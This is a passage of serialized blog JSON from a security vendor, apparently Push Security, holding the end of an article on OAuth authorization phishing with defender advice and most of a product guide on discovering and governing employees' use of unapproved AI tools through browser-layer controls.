are the logical next step — device code phishing has already been demonstrated against Salesforce, and I showed off GitHub targeting in my recent webinar. Any platform that supports the authorization code grant with localhost redirect or the device authorization grant is a potential target. ",[],{},{"nodeType":1041,"data":10329,"content":10333},{"target":10330},{"sys":10331},{"id":10332,"type":1046,"linkType":1047},"UIOVxK4yPURUu8slsKWMu",[],{"nodeType":695,"data":10335,"content":10336},{},[10337,10342,10346,10354],{"nodeType":699,"value":10338,"marks":10339,"data":10341},"But OAuth is complex, and the authorization mechanisms that have been abused so far likely don't represent the full attack surface. ",[10340],{"type":707},{},{"nodeType":699,"value":10343,"marks":10344,"data":10345},"Everything discussed so far has been initial access, but OAuth is also powerful at the persistence and lateral movement layers — an attacker who plants a malicious OAuth grant during a compromise has a ",[],{},{"nodeType":791,"data":10347,"content":10349},{"uri":10348},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fnearly-invisible-attack-chain\u002F",[10350],{"nodeType":699,"value":10351,"marks":10352,"data":10353},"stealthy persistence mechanism",[],{},{"nodeType":699,"value":10355,"marks":10356,"data":10357}," that survives credential resets and password changes, and can be extremely difficult to detect. As authorization phishing matures, we expect these post-compromise OAuth techniques to become more common too.",[],{},{"nodeType":695,"data":10359,"content":10360},{},[10361,10364,10371],{"nodeType":699,"value":4447,"marks":10362,"data":10363},[],{},{"nodeType":791,"data":10365,"content":10366},{"uri":1332},[10367],{"nodeType":699,"value":10368,"marks":10369,"data":10370},"poisoned tenant attack surface",[],{},{"nodeType":699,"value":10372,"marks":10373,"data":10374}," also remains largely undefended, which could see more typical consent phishing come back around. Historically, consent phishing involved an attacker creating a malicious app and inviting their targets to it. But you can just set up a tenant on a legit SaaS app and use that instead.",[],{},{"nodeType":695,"data":10376,"content":10377},{},[10378,10382,10389],{"nodeType":699,"value":10379,"marks":10380,"data":10381},"Most SaaS platforms let anyone create a workspace impersonating any organization, and few offer controls for admins to restrict which tenants their employees can join. We ",[],{},{"nodeType":791,"data":10383,"content":10384},{"uri":1332},[10385],{"nodeType":699,"value":10386,"marks":10387,"data":10388},"recently experienced this directly",[],{},{"nodeType":699,"value":10390,"marks":10391,"data":10392}," when an attacker created a fake OpenAI organization under our company's name and invited specific employees to join it.",[],{},{"nodeType":1041,"data":10394,"content":10398},{"target":10395},{"sys":10396},{"id":10397,"type":1046,"linkType":1047},"1YPMilWhyTSV860PCFXxmx",[],{"nodeType":721,"data":10400,"content":10401},{},[],{"nodeType":725,"data":10403,"content":10404},{},[10405],{"nodeType":699,"value":10406,"marks":10407,"data":10409},"What defenders should actually do",[10408],{"type":707},{},{"nodeType":695,"data":10411,"content":10412},{},[10413,10418],{"nodeType":699,"value":10414,"marks":10415,"data":10417},"First, test your defenses against authorization attacks specifically.",[10416],{"type":707},{},{"nodeType":699,"value":10419,"marks":10420,"data":10421}," Don't assume that MFA, passkeys, or conditional access policies handle this. Run a device code phishing simulation against your environment and verify that your conditional access configuration actually blocks it. Test ConsentFix scenarios. If your controls rely on configuration assumptions you haven't validated, you have a gap.",[],{},{"nodeType":695,"data":10423,"content":10424},{},[10425,10430],{"nodeType":699,"value":10426,"marks":10427,"data":10429},"Second, don't treat this as exclusively a Microsoft problem. ",[10428],{"type":707},{},{"nodeType":699,"value":10431,"marks":10432,"data":10433},"Device code phishing can work against several apps. GitHub exposes broad scopes including full repository access and uses device code as the default CLI sign-in method — meaning developers encounter legitimate device code flows routinely, making phishing lures harder to distinguish from normal workflow. ConsentFix-style attacks targeting authorization code grants with localhost redirects could also expand beyond Microsoft as the technique matures.",[],{},{"nodeType":695,"data":10435,"content":10436},{},[10437,10442],{"nodeType":699,"value":10438,"marks":10439,"data":10441},"Third, update your security awareness training.",[10440],{"type":707},{},{"nodeType":699,"value":10443,"marks":10444,"data":10445}," Most employees have no concept of authorization phishing — it doesn't look or feel like any phishing that they're used to. There's no suspicious login page, no credential entry on an unfamiliar domain. Traditional awareness training does not prepare users for this.",[],{},{"nodeType":695,"data":10447,"content":10448},{},[10449],{"nodeType":699,"value":10450,"marks":10451,"data":10452},"But to detect and block these attacks as they happen, you need to be in the browser. Push detects and blocks authorization attacks in real time, when the user is tricked into performing the malicious consent grant. We detected ConsentFix the first time it appeared in the wild, before any other vendor, and device code phishing detection has been live since the technique first entered mainstream use.",[],{},{"nodeType":769,"data":10454,"content":10455},{},[10456],{"nodeType":699,"value":10457,"marks":10458,"data":10460},"Watch the research",[10459],{"type":707},{},{"nodeType":695,"data":10462,"content":10463},{},[10464,10468,10476,10480,10488],{"nodeType":699,"value":10465,"marks":10466,"data":10467},"I recently talked about authorization phishing at ",[],{},{"nodeType":791,"data":10469,"content":10471},{"uri":10470},"https:\u002F\u002Fbsideslv.org\u002Fschedule3#PA",[10472],{"nodeType":699,"value":10473,"marks":10474,"data":10475},"BSides Las Vegas 2026",[],{},{"nodeType":699,"value":10477,"marks":10478,"data":10479},", walking through live demonstrations of device code phishing (including against passkey-protected accounts), ConsentFix, and conditional access policy bypass testing. The full talk is available to ",[],{},{"nodeType":791,"data":10481,"content":10483},{"uri":10482},"https:\u002F\u002Fwww.youtube.com\u002Flive\u002F9wx9Nt3JWSs",[10484],{"nodeType":699,"value":10485,"marks":10486,"data":10487},"watch on YouTube",[],{},{"nodeType":699,"value":10489,"marks":10490,"data":10491}," (starts at 27:12).",[],{},"Authorization phishing: why attackers stopped targeting the login","Why attackers are pivoting to authorization attacks to get around authentication controls, how they work, and what security teams can do about them.","2026-08-24T00:00:00.000Z","authorization-phishing",{"items":10497},[10498,10500],{"sys":10499,"name":1833},{"id":1832},{"sys":10501,"name":1837},{"id":1836},{"items":10503},[10504],{"fullName":10505,"firstName":10506,"jobTitle":10507,"profilePicture":10508},"Luke Jennings","Luke","Vice President, R&D",{"url":10509},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4Hosb4zKi1dA0PUyDLMe1h\u002F27e09d894861f2196ba794037986fb08\u002FT016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"__typename":952,"sys":10511,"content":10513,"title":11396,"synopsis":11397,"hashTags":60,"publishedDate":11398,"slug":11399,"tagsCollection":11400,"authorsCollection":11410},{"id":10512},"7MB9tEe6mrdNXbkYVhgyWn",{"json":10514},{"nodeType":691,"data":10515,"content":10516},{},[10517,10524,10531,10579,10586,10593,10656,10662,10665,10673,10680,10692,10698,10710,10716,10728,10734,10737,10745,10752,10771,10782,10789,10796,10799,10807,10814,10838,10844,10851,10867,10883,10889,10905,10921,10928,10935,10942,10948,10951,10959,10966,10973,10980,10996,11003,11028,11034,11041,11047,11059,11066,11072,11078,11081,11089,11096,11114,11121,11129,11136,11148,11164,11170,11182,11214,11221,11237,11243,11255,11261,11276,11292,11298,11305,11312,11315,11323,11330,11337,11344,11351,11358,11365,11368,11374,11380],{"nodeType":695,"data":10518,"content":10519},{},[10520],{"nodeType":699,"value":10521,"marks":10522,"data":10523},"Every security team that's blocked an AI tool at the network level has had the same experience three months later: The tool they blocked isn't in use, but a dozen they've never heard of are.",[],{},{"nodeType":695,"data":10525,"content":10526},{},[10527],{"nodeType":699,"value":10528,"marks":10529,"data":10530},"The block didn't stop employees from using AI. It just prevented the security team from seeing what’s actually happening.",[],{},{"nodeType":695,"data":10532,"content":10533},{},[10534,10538,10546,10550,10555,10558,10563,10567,10575],{"nodeType":699,"value":10535,"marks":10536,"data":10537},"The data backs up this pattern. ",[],{},{"nodeType":791,"data":10539,"content":10541},{"uri":10540},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhat-push-data-reveals-about-the-state-of-shadow-ai\u002F",[10542],{"nodeType":699,"value":10543,"marks":10544,"data":10545},"Push telemetry",[],{},{"nodeType":699,"value":10547,"marks":10548,"data":10549}," shows that the average organization has ",[],{},{"nodeType":699,"value":10551,"marks":10552,"data":10554},"16 AI apps, 17 AI browser extensions,",[10553],{"type":707},{},{"nodeType":699,"value":7294,"marks":10556,"data":10557},[],{},{"nodeType":699,"value":10559,"marks":10560,"data":10562},"17 AI OAuth integrations",[10561],{"type":707},{},{"nodeType":699,"value":10564,"marks":10565,"data":10566}," in active use during a typical week — most unapproved. Meanwhile, ",[],{},{"nodeType":791,"data":10568,"content":10570},{"uri":10569},"https:\u002F\u002Fwww.okta.com\u002Fnewsroom\u002Farticles\u002Fai-agents-at-work-2026-agentic-enterprise-security\u002F",[10571],{"nodeType":699,"value":10572,"marks":10573,"data":10574},"Okta found",[],{},{"nodeType":699,"value":10576,"marks":10577,"data":10578}," that 80% of employees who use unapproved AI tools do so because it's easier to use their own accounts, and 57% because the approval process is too slow.",[],{},{"nodeType":695,"data":10580,"content":10581},{},[10582],{"nodeType":699,"value":10583,"marks":10584,"data":10585},"The organizations getting this right have stopped treating AI governance as an access-control problem — which tools to allow, which to block — and started treating it as an invitation to build out an infrastructure to enable appropriate use. Employees are going to use the tools they need to get their work done. The question is whether they'll use them on a path you built and instrumented, or on one they carved themselves.",[],{},{"nodeType":695,"data":10587,"content":10588},{},[10589],{"nodeType":699,"value":10590,"marks":10591,"data":10592},"This guide walks through how to build that paved path. Using Push, you can:",[],{},{"nodeType":1589,"data":10594,"content":10595},{},[10596,10606,10616,10626,10636,10646],{"nodeType":1593,"data":10597,"content":10598},{},[10599],{"nodeType":695,"data":10600,"content":10601},{},[10602],{"nodeType":699,"value":10603,"marks":10604,"data":10605},"Identify shadow AI, including personal accounts on approved corporate apps, AI browser extensions, OAuth integrations into sensitive systems, and AI browser usage.",[],{},{"nodeType":1593,"data":10607,"content":10608},{},[10609],{"nodeType":695,"data":10610,"content":10611},{},[10612],{"nodeType":699,"value":10613,"marks":10614,"data":10615},"Enforce policies on data flows into and out of AI apps, including blocking unapproved file uploads, downloads, and clipboard pastes; and monitoring AI chat transcripts.",[],{},{"nodeType":1593,"data":10617,"content":10618},{},[10619],{"nodeType":695,"data":10620,"content":10621},{},[10622],{"nodeType":699,"value":10623,"marks":10624,"data":10625},"Use just-in-time guardrails to intercept users accessing unapproved AI tools and point them at approved alternatives.",[],{},{"nodeType":1593,"data":10627,"content":10628},{},[10629],{"nodeType":695,"data":10630,"content":10631},{},[10632],{"nodeType":699,"value":10633,"marks":10634,"data":10635},"Block personal account access to AI apps, even those approved for corporate use, preventing data loss in unapproved tenants.",[],{},{"nodeType":1593,"data":10637,"content":10638},{},[10639],{"nodeType":695,"data":10640,"content":10641},{},[10642],{"nodeType":699,"value":10643,"marks":10644,"data":10645},"Prevent unwanted MCP connections with app-agnostic controls.",[],{},{"nodeType":1593,"data":10647,"content":10648},{},[10649],{"nodeType":695,"data":10650,"content":10651},{},[10652],{"nodeType":699,"value":10653,"marks":10654,"data":10655},"Automate a lot of the work so you don’t burn out your team as the AI landscape continues to shift.",[],{},{"nodeType":1041,"data":10657,"content":10661},{"target":10658},{"sys":10659},{"id":10660,"type":1046,"linkType":1047},"29N8YH9As3GHypOve3br80",[],{"nodeType":721,"data":10663,"content":10664},{},[],{"nodeType":725,"data":10666,"content":10667},{},[10668],{"nodeType":699,"value":10669,"marks":10670,"data":10672},"What is shadow AI, and why can't you manage it like shadow IT?",[10671],{"type":707},{},{"nodeType":695,"data":10674,"content":10675},{},[10676],{"nodeType":699,"value":10677,"marks":10678,"data":10679},"Shadow AI is any use of AI tools, services, or integrations that happens outside an organization's security governance and visibility. Security teams have been managing shadow SaaS for years, but shadow AI can't be addressed with the same playbook — for three reasons.",[],{},{"nodeType":695,"data":10681,"content":10682},{},[10683,10688],{"nodeType":699,"value":10684,"marks":10685,"data":10687},"First",[10686],{"type":707},{},{"nodeType":699,"value":10689,"marks":10690,"data":10691},", it spans multiple categories that each need different controls: unapproved AI apps, personal accounts on approved corporate AI tools, AI browser extensions, and OAuth integrations into corporate systems. Blocking unapproved apps doesn't address personal accounts on approved ones, and neither solves the extension or OAuth problem. ",[],{},{"nodeType":1041,"data":10693,"content":10697},{"target":10694},{"sys":10695},{"id":10696,"type":1046,"linkType":1047},"2hsKQ9DEspflhmtR0bE7QY",[],{"nodeType":695,"data":10699,"content":10700},{},[10701,10706],{"nodeType":699,"value":10702,"marks":10703,"data":10705},"Second",[10704],{"type":707},{},{"nodeType":699,"value":10707,"marks":10708,"data":10709},", the tools most organizations rely on to manage shadow SaaS — SWGs, CASBs, EDR, IdP logs — are structurally blind to shadow AI. An SWG sees that someone visited an AI domain but can't tell you whether they logged in, pasted source code into a prompt, or granted OAuth access to your Google Workspace tenant. EDR doesn't see browser-layer activity at all. IdP logs capture OAuth grants routed through the identity provider but miss tools accessed via direct signup or personal accounts. Instead, the activity security teams need to see happens primarily inside the browser.",[],{},{"nodeType":1041,"data":10711,"content":10715},{"target":10712},{"sys":10713},{"id":10714,"type":1046,"linkType":1047},"1vE0dyAKdnTSjyAJ4Xoadd",[],{"nodeType":695,"data":10717,"content":10718},{},[10719,10724],{"nodeType":699,"value":10720,"marks":10721,"data":10723},"Third",[10722],{"type":707},{},{"nodeType":699,"value":10725,"marks":10726,"data":10727},", the risk profile is different. Shadow AI tools increasingly function as hubs — connected via OAuth integrations and MCP to email, cloud storage, code repositories, and other high-value systems. They leak sensitive data outward (employees paste source code, credentials, and internal documents into prompts daily) while simultaneously expanding the attack surface inward (compromise a single AI app and an attacker inherits whatever access the employee granted it, turning one ungoverned tool into a pivot point across the SaaS estate). ",[],{},{"nodeType":1041,"data":10729,"content":10733},{"target":10730},{"sys":10731},{"id":10732,"type":1046,"linkType":1047},"3ldZ23OORTu7INBfSnE7R7",[],{"nodeType":721,"data":10735,"content":10736},{},[],{"nodeType":725,"data":10738,"content":10739},{},[10740],{"nodeType":699,"value":10741,"marks":10742,"data":10744},"Why blocking AI usage fails",[10743],{"type":707},{},{"nodeType":695,"data":10746,"content":10747},{},[10748],{"nodeType":699,"value":10749,"marks":10750,"data":10751},"The instinct to block AI tools makes sense. Executives are asking about AI risk to the business, a new tool appears every week, and blocking unapproved apps feels like a quick way to stop the bleeding.",[],{},{"nodeType":695,"data":10753,"content":10754},{},[10755,10759,10767],{"nodeType":699,"value":10756,"marks":10757,"data":10758},"Unfortunately, blocking doesn't work for long. The latest security frameworks — including the ",[],{},{"nodeType":791,"data":10760,"content":10762},{"uri":10761},"https:\u002F\u002Fwww.sans.org\u002Fmlp\u002F2026-ai-security-maturity-model-ebook",[10763],{"nodeType":699,"value":10764,"marks":10765,"data":10766},"SANS AI Security Maturity Model",[],{},{"nodeType":699,"value":10768,"marks":10769,"data":10770}," — all agree: Block-based AI policies drive usage underground rather than preventing it. ",[],{},{"nodeType":10772,"data":10773,"content":10774},"blockquote",{},[10775],{"nodeType":695,"data":10776,"content":10777},{},[10778],{"nodeType":699,"value":10779,"marks":10780,"data":10781},"A block-based AI policy may feel like risk management, but practitioner experience shows that it typically drives AI usage underground rather than preventing it. The goal is not to eliminate AI use; it is to bring it into visibility where it can be governed.",[],{},{"nodeType":695,"data":10783,"content":10784},{},[10785],{"nodeType":699,"value":10786,"marks":10787,"data":10788},"These kinds of barricades also fail for a structural reason: They're built on the network perimeter, and AI usage doesn't cross the perimeter in ways network tools can inspect.",[],{},{"nodeType":695,"data":10790,"content":10791},{},[10792],{"nodeType":699,"value":10793,"marks":10794,"data":10795},"The most damaging consequence of blocking isn't the workarounds themselves — it's the loss of visibility. To begin building a better path for employees, you have to start with seeing what's actually happening.",[],{},{"nodeType":721,"data":10797,"content":10798},{},[],{"nodeType":725,"data":10800,"content":10801},{},[10802],{"nodeType":699,"value":10803,"marks":10804,"data":10806},"Using Push to discover, govern, and control shadow AI",[10805],{"type":707},{},{"nodeType":695,"data":10808,"content":10809},{},[10810],{"nodeType":699,"value":10811,"marks":10812,"data":10813},"Push Security is a browser security platform that gets you the vantage point you need to start addressing shadow AI. Push deploys as a lightweight extension to employees' existing browsers rather than requiring a full browser migration, giving security teams visibility into browser-layer activity that network and endpoint tools structurally lack.",[],{},{"nodeType":695,"data":10815,"content":10816},{},[10817,10821,10826,10829,10834],{"nodeType":699,"value":10818,"marks":10819,"data":10820},"Push discovers AI tools through ",[],{},{"nodeType":699,"value":10822,"marks":10823,"data":10825},"automatic",[10824],{"type":707},{},{"nodeType":699,"value":4535,"marks":10827,"data":10828},[],{},{"nodeType":699,"value":10830,"marks":10831,"data":10833},"app discovery",[10832],{"type":707},{},{"nodeType":699,"value":10835,"marks":10836,"data":10837},", allowing you to identify applications from actual browser login events rather than network traffic logs. ",[],{},{"nodeType":1041,"data":10839,"content":10843},{"target":10840},{"sys":10841},{"id":10842,"type":1046,"linkType":1047},"4eTkgU2dxhMueHPiwuCWDl",[],{"nodeType":695,"data":10845,"content":10846},{},[10847],{"nodeType":699,"value":10848,"marks":10849,"data":10850},"When an employee signs into a new AI service, Push registers the authentication event, identifies the application, and logs how the employee authenticated — corporate SSO, OIDC, a standalone password, or a personal account. ",[],{},{"nodeType":695,"data":10852,"content":10853},{},[10854,10858,10863],{"nodeType":699,"value":10855,"marks":10856,"data":10857},"Push then applies ",[],{},{"nodeType":699,"value":10859,"marks":10860,"data":10862},"app categories ",[10861],{"type":707},{},{"nodeType":699,"value":10864,"marks":10865,"data":10866},"automatically, classifying the discovered application by type without requiring security teams to build or maintain manual lists.",[],{},{"nodeType":695,"data":10868,"content":10869},{},[10870,10874,10879],{"nodeType":699,"value":10871,"marks":10872,"data":10873},"Push extends the same discovery across the other three shadow AI dimensions. The platform’s ",[],{},{"nodeType":699,"value":10875,"marks":10876,"data":10878},"browser extension discovery ",[10877],{"type":707},{},{"nodeType":699,"value":10880,"marks":10881,"data":10882},"capability catalogs every AI-related extension installed across the workforce, including the specific permissions each extension has requested (access to page content, browsing history, clipboard data), allowing you to review whether those permission combinations could enable data exfiltration or account takeover. ",[],{},{"nodeType":1041,"data":10884,"content":10888},{"target":10885},{"sys":10886},{"id":10887,"type":1046,"linkType":1047},"1z56sTWWN9E35dE3HhbRNY",[],{"nodeType":695,"data":10890,"content":10891},{},[10892,10896,10901],{"nodeType":699,"value":10893,"marks":10894,"data":10895},"Push’s ",[],{},{"nodeType":699,"value":10897,"marks":10898,"data":10900},"OAuth integration discovery",[10899],{"type":707},{},{"nodeType":699,"value":10902,"marks":10903,"data":10904}," identifies OAuth connections between AI tools and corporate systems — the grants that create persistent API-level access to platforms like Google Workspace.",[],{},{"nodeType":695,"data":10906,"content":10907},{},[10908,10912,10917],{"nodeType":699,"value":10909,"marks":10910,"data":10911},"For each discovered tool, Push also captures authentication context that points to ",[],{},{"nodeType":699,"value":10913,"marks":10914,"data":10916},"where hidden security risks lie",[10915],{"type":707},{},{"nodeType":699,"value":10918,"marks":10919,"data":10920},": SSO vs. password vs. personal account, MFA status, and password strength. An AI tool accessed via corporate SSO with MFA is a different risk than the same tool accessed through a personal Gmail account with a reused password. Similarly, employees using only a password to access AI tools that they’ve integrated with other sensitive corporate systems introduces another level of downstream risk. That context is what makes the inventory actionable.",[],{},{"nodeType":695,"data":10922,"content":10923},{},[10924],{"nodeType":699,"value":10925,"marks":10926,"data":10927},"Push also detects when employees are adopting agentic browsers — autonomous AI-powered browsers like Comet, Atlas, and Dia that browse the web and interact with applications on behalf of users or automated workflows. ",[],{},{"nodeType":695,"data":10929,"content":10930},{},[10931],{"nodeType":699,"value":10932,"marks":10933,"data":10934},"These represent an emerging category of non-human AI identity. They authenticate to SaaS applications, access corporate data, and make API calls, but they aren't managed through traditional identity infrastructure. Push helps you identify these agentic browsers as they appear in the environment, before they become a blind spot.",[],{},{"nodeType":695,"data":10936,"content":10937},{},[10938],{"nodeType":699,"value":10939,"marks":10940,"data":10941},"Returning to the paved path metaphor, this step is about surveying the site before you figure out where to put in the path. You need to understand who’s already doing what, where, so you can find the risks you need to address.",[],{},{"nodeType":1041,"data":10943,"content":10947},{"target":10944},{"sys":10945},{"id":10946,"type":1046,"linkType":1047},"5iXyJbxwWiUt7WoP7FF0Y2",[],{"nodeType":721,"data":10949,"content":10950},{},[],{"nodeType":725,"data":10952,"content":10953},{},[10954],{"nodeType":699,"value":10955,"marks":10956,"data":10958},"Step-by-step guide to enforcing AI governance without blocking everything",[10957],{"type":707},{},{"nodeType":695,"data":10960,"content":10961},{},[10962],{"nodeType":699,"value":10963,"marks":10964,"data":10965},"The barricade approach favored by existing solutions like network proxies gives you two options: Allow or block. Enforcing AI policy effectively requires a third approach with a bit more nuance: Guide the user to do the right thing. ",[],{},{"nodeType":769,"data":10967,"content":10968},{},[10969],{"nodeType":699,"value":10970,"marks":10971,"data":10972},"Building the \"paved path\" with Push",[],{},{"nodeType":695,"data":10974,"content":10975},{},[10976],{"nodeType":699,"value":10977,"marks":10978,"data":10979},"Push provides all three options as configurable enforcement modes for a variety of readymade controls. Progressing between them is how organizations can move from \"we don't know what people are doing with AI\" to evidence-based governance.",[],{},{"nodeType":695,"data":10981,"content":10982},{},[10983,10987,10992],{"nodeType":699,"value":10984,"marks":10985,"data":10986},"Push can be deployed silently and begin observing AI usage with no employee-facing intervention. This is effectively Push in ",[],{},{"nodeType":699,"value":10988,"marks":10989,"data":10991},"Monitor",[10990],{"type":707},{},{"nodeType":699,"value":10993,"marks":10994,"data":10995}," mode.",[],{},{"nodeType":695,"data":10997,"content":10998},{},[10999],{"nodeType":699,"value":11000,"marks":11001,"data":11002},"The platform records which tools are in use, how employees authenticated, and what usage patterns are emerging. Most organizations should start here to generate a baseline. Telemetry can be streamed to your SIEM or other downstream system to get alerted to newly adopted apps and extensions, and to surface security risks like insecure accounts.",[],{},{"nodeType":695,"data":11004,"content":11005},{},[11006,11010,11015,11019,11024],{"nodeType":699,"value":11007,"marks":11008,"data":11009},"Next, most organizations will transition to ",[],{},{"nodeType":699,"value":11011,"marks":11012,"data":11014},"Acknowledge",[11013],{"type":707},{},{"nodeType":699,"value":11016,"marks":11017,"data":11018}," mode for controls like in-browser ",[],{},{"nodeType":699,"value":11020,"marks":11021,"data":11023},"App banners",[11022],{"type":707},{},{"nodeType":699,"value":11025,"marks":11026,"data":11027},". With this control, you can warn employees when they attempt to use an unapproved AI tool and point them to approved alternatives.",[],{},{"nodeType":1041,"data":11029,"content":11033},{"target":11030},{"sys":11031},{"id":11032,"type":1046,"linkType":1047},"17nT8JDTyHLExwhb2upb6T",[],{"nodeType":695,"data":11035,"content":11036},{},[11037],{"nodeType":699,"value":11038,"marks":11039,"data":11040},"The employee isn't blocked — they're guided toward the governed path at the moment they're about to step off it. This is more effective than a policy document because it arrives right when they need the reminder. ",[],{},{"nodeType":1041,"data":11042,"content":11046},{"target":11043},{"sys":11044},{"id":11045,"type":1046,"linkType":1047},"2lDFCuc48jcGODcwD6nYhK",[],{"nodeType":695,"data":11048,"content":11049},{},[11050,11055],{"nodeType":699,"value":11051,"marks":11052,"data":11054},"Block",[11053],{"type":707},{},{"nodeType":699,"value":11056,"marks":11057,"data":11058}," mode prevents access entirely — Push presents a blocking banner to users who attempt to log in to unapproved apps. ",[],{},{"nodeType":695,"data":11060,"content":11061},{},[11062],{"nodeType":699,"value":11063,"marks":11064,"data":11065},"Push makes the Monitor → Acknowledge → Block progression practical through automatic app categorization. This means that new AI tools inherit whatever governance mode the team has set for that category, without manual blocklist updates. All controls are configurable per user group — the data science team can use AI coding assistants while uploads from finance are restricted — because different teams have different risk profiles.",[],{},{"nodeType":1041,"data":11067,"content":11071},{"target":11068},{"sys":11069},{"id":11070,"type":1046,"linkType":1047},"5EBOHy6X6iJfmzJ65txGOv",[],{"nodeType":1041,"data":11073,"content":11077},{"target":11074},{"sys":11075},{"id":11076,"type":1046,"linkType":1047},"31JnX2KNCAnlaVS9Qqqh8W",[],{"nodeType":721,"data":11079,"content":11080},{},[],{"nodeType":725,"data":11082,"content":11083},{},[11084],{"nodeType":699,"value":11085,"marks":11086,"data":11088},"Guardrails: how to prevent data loss to AI tools",[11087],{"type":707},{},{"nodeType":695,"data":11090,"content":11091},{},[11092],{"nodeType":699,"value":11093,"marks":11094,"data":11095},"Even on the paved path, you need guardrails because preventing data loss to AI tools is a separate problem from controlling which tools employees use. An employee on an approved AI tool can still paste an AWS access key into a prompt, upload a customer spreadsheet, or share confidential documents in a conversation. Or they can access an approved AI tool but using a personal account, landing in a different tenant and effectively bypassing enterprise agreements that govern safe data sharing or model training.",[],{},{"nodeType":695,"data":11097,"content":11098},{},[11099,11102,11110],{"nodeType":699,"value":21,"marks":11100,"data":11101},[],{},{"nodeType":791,"data":11103,"content":11104},{"uri":10569},[11105],{"nodeType":699,"value":11106,"marks":11107,"data":11109},"Okta's data",[11108],{"type":799},{},{"nodeType":699,"value":11111,"marks":11112,"data":11113}," on what employees actually share shows what’s at stake: 54% share internal messages and emails with AI tools, 39% share confidential company documents, and 28% share banking and payment information.",[],{},{"nodeType":695,"data":11115,"content":11116},{},[11117],{"nodeType":699,"value":11118,"marks":11119,"data":11120},"Blocking is too much of a blunt instrument here, as obviously, you want employees to be able to use approved tools. The answer is controlling what data enters them.",[],{},{"nodeType":769,"data":11122,"content":11123},{},[11124],{"nodeType":699,"value":11125,"marks":11126,"data":11128},"Browser-layer controls for AI data leakage",[11127],{"type":707},{},{"nodeType":695,"data":11130,"content":11131},{},[11132],{"nodeType":699,"value":11133,"marks":11134,"data":11135},"Push addresses this problem with five browser-layer data controls, each targeting a distinct exfiltration path and supporting the same Monitor → Warn → Block enforcement modes:",[],{},{"nodeType":695,"data":11137,"content":11138},{},[11139,11144],{"nodeType":699,"value":11140,"marks":11141,"data":11143},"Clipboard blocking",[11142],{"type":707},{},{"nodeType":699,"value":11145,"marks":11146,"data":11147}," addresses the most common path for sensitive data into AI tools: copy-paste. Push matches clipboard content against preconfigured patterns for AWS access keys, GitHub tokens, API keys, credit card numbers, and personal identifiers, plus custom content rules for organization-specific data like internal project codes. ",[],{},{"nodeType":695,"data":11149,"content":11150},{},[11151,11155,11160],{"nodeType":699,"value":11152,"marks":11153,"data":11154},"In ",[],{},{"nodeType":699,"value":11156,"marks":11157,"data":11159},"Warn",[11158],{"type":707},{},{"nodeType":699,"value":11161,"marks":11162,"data":11163}," mode, Push offers a redacted version of the sensitive data so the employee can continue their work — getting help with their code, for instance — without exposing the actual credential.",[],{},{"nodeType":1041,"data":11165,"content":11169},{"target":11166},{"sys":11167},{"id":11168,"type":1046,"linkType":1047},"1JarUdbe8AkJlgB0LjchNR",[],{"nodeType":695,"data":11171,"content":11172},{},[11173,11178],{"nodeType":699,"value":11174,"marks":11175,"data":11177},"File upload blocking",[11176],{"type":707},{},{"nodeType":699,"value":11179,"marks":11180,"data":11181}," prevents files from being uploaded to specific AI apps, configurable by app, user group, and file type (Push provides a list for fast configuration).",[],{},{"nodeType":695,"data":11183,"content":11184},{},[11185,11190,11194,11202,11206,11210],{"nodeType":699,"value":11186,"marks":11187,"data":11189},"File download blocking",[11188],{"type":707},{},{"nodeType":699,"value":11191,"marks":11192,"data":11193}," addresses a different common risk: Employees downloading desktop versions of AI tools, which moves usage outside the browser where Push has visibility. Download blocking also covers files generated inside web applications, such as an AI tool that produces a downloadable asset. (Push’s detection and response capabilities also protect against scenarios in which attackers present users with ",[],{},{"nodeType":791,"data":11195,"content":11196},{"uri":8660},[11197],{"nodeType":699,"value":11198,"marks":11199,"data":11201},"faked AI tool download pages",[11200],{"type":799},{},{"nodeType":699,"value":11203,"marks":11204,"data":11205}," as part of phishing campaigns, a technique we dubbed ",[],{},{"nodeType":699,"value":7534,"marks":11207,"data":11209},[11208],{"type":707},{},{"nodeType":699,"value":11211,"marks":11212,"data":11213},".)",[],{},{"nodeType":695,"data":11215,"content":11216},{},[11217],{"nodeType":699,"value":11218,"marks":11219,"data":11220},"Push also provides telemetry streams on all file upload and download events in your environment, so you can get a baseline pattern of life and identify anomalies that could indicate insider risk. ",[],{},{"nodeType":695,"data":11222,"content":11223},{},[11224,11228,11233],{"nodeType":699,"value":11225,"marks":11226,"data":11227},"The Push platform also provides the capability to write your own ",[],{},{"nodeType":699,"value":11229,"marks":11230,"data":11232},"custom detections",[11231],{"type":707},{},{"nodeType":699,"value":11234,"marks":11235,"data":11236},", which you can use for other organization-specific use cases, or even to extend your control over GenAI tool usage, such as by blocking unapproved MCP server connections.",[],{},{"nodeType":1041,"data":11238,"content":11242},{"target":11239},{"sys":11240},{"id":11241,"type":1046,"linkType":1047},"5XYVgJjgUPUfY1W1Zcgrvm",[],{"nodeType":695,"data":11244,"content":11245},{},[11246,11251],{"nodeType":699,"value":11247,"marks":11248,"data":11250},"Account condition enforcement",[11249],{"type":707},{},{"nodeType":699,"value":11252,"marks":11253,"data":11254}," allows you to prevent employees from accessing AI apps with personal accounts, enforcing only corporate identity access to those tools. Shadow personal account usage of even approved AI apps can lead to data compliance issues, since anything shared during that session goes into a tenant not governed by your usual enterprise plan. Personal account access of approved AI tools is also challenging to audit or secure.",[],{},{"nodeType":1041,"data":11256,"content":11260},{"target":11257},{"sys":11258},{"id":11259,"type":1046,"linkType":1047},"2rxhSuW8q45hFb7afsfMqc",[],{"nodeType":695,"data":11262,"content":11263},{},[11264,11267,11272],{"nodeType":699,"value":10893,"marks":11265,"data":11266},[],{},{"nodeType":699,"value":11268,"marks":11269,"data":11271},"Account condition enforcement ",[11270],{"type":707},{},{"nodeType":699,"value":11273,"marks":11274,"data":11275},"control also allows you to set access conditions based on approved (or unapproved) browsers and login methods (e.g. password, OIDC).",[],{},{"nodeType":695,"data":11277,"content":11278},{},[11279,11283,11288],{"nodeType":699,"value":11280,"marks":11281,"data":11282},"Finally, ",[],{},{"nodeType":699,"value":11284,"marks":11285,"data":11287},"AI conversation visibility",[11286],{"type":707},{},{"nodeType":699,"value":11289,"marks":11290,"data":11291}," gives you a window into what is being shared in AI chats, consumable as a stream of events to your SIEM or SOAR. Over time, you can build up a picture of what’s normal or what violates company policy, and create a queryable history to identify potential data loss during an incident response 